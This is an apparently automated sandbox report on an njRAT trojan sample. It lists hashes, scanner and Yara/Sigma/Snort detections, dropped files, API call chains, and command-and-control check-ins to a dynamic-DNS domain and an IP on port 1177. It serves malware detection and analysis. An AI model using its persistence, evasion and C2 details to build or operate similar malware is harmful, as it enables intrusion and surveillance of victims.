Windows Analysis Report
._cache_1.exe

Overview

General Information

Sample name: ._cache_1.exe
Analysis ID: 1465120
MD5: 62c01f1b2ac0a7bab6c3b50fd51e6a36
SHA1: cfc301a04b9a4ffeb0dc4578c1998a4eb4754f7b
SHA256: c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e
Infos:

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Disables zone checking for all users
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses dynamic DNS services
Uses netsh to modify the Windows network and firewall settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Powershell In Registry Run Keys
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
NjRAT RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
 https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: ._cache_1.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe Avira: detection malicious, Label: HEUR/AGEN.1321308
Multi AV Scanner detection for domain / URL
Source: water-boom.duckdns.org Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tr.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Virustotal: Detection: 66% Perma Link
Source: C:\Users\user\AppData\Local\Temp\x.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\x.exe Virustotal: Detection: 68% Perma Link
Multi AV Scanner detection for submitted file
Source: ._cache_1.exe ReversingLabs: Detection: 80%
Source: ._cache_1.exe Virustotal: Detection: 68% Perma Link
Yara detected Njrat
Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 87.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ._cache_1.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: ._cache_1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Checks for available system drives (often done to infect USB drives)
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: z: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: x: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: v: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: t: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: r: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: p: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: n: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: l: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: j: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: h: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: f: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: b: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: y: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: w: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: u: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: s: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: q: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: o: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: m: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: k: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: i: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: g: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: e: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: c: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: a: Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2449B GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00B2449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00B2C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C75D FindFirstFileW,FindClose, 1_2_00B2C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2BD48
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040449B GetFileAttributesW,FindFirstFileW,FindClose, 12_2_0040449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C75D FindFirstFileW,FindClose, 12_2_0040C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 12_2_0040C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040BD48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49162 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49163 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49164 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49165 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49166 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49167 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49168 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49169 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49170 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49171 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49172 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49173 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49174 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49175 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49176 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49177 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49178 -> 192.169.69.25:1177
Uses dynamic DNS services
Source: unknown DNS query: name: water-boom.duckdns.org
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.169.69.25 192.169.69.25
Source: Joe Sandbox View IP Address: 192.169.69.25 192.169.69.25
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WOWUS WOWUS
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic DNS traffic detected: DNS query: water-boom.duckdns.org
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.872864488.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395438531.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.coh
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/cb
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B3427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_00B3427A
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0041427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 12_2_0041427A
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046DC80
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 0_2_0044C37A
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C81C
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B4CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00B4CB26
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0042CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 12_2_0042CB26

E-Banking Fraud
barindex
Yara detected Njrat
Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: This is a third-party compiled AutoIt script. 1_2_00AC3B4C
Source: Tr.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2ccbde9e-c
Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_a087d829-7
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: This is a third-party compiled AutoIt script. 12_2_003A3B4C
Source: Tr.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d5d18cac-2
Source: Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_ee892166-0
Source: Tr.exe.0.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_43b68f85-8
Source: Tr.exe.0.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_ed1a719d-c
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\._cache_1.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
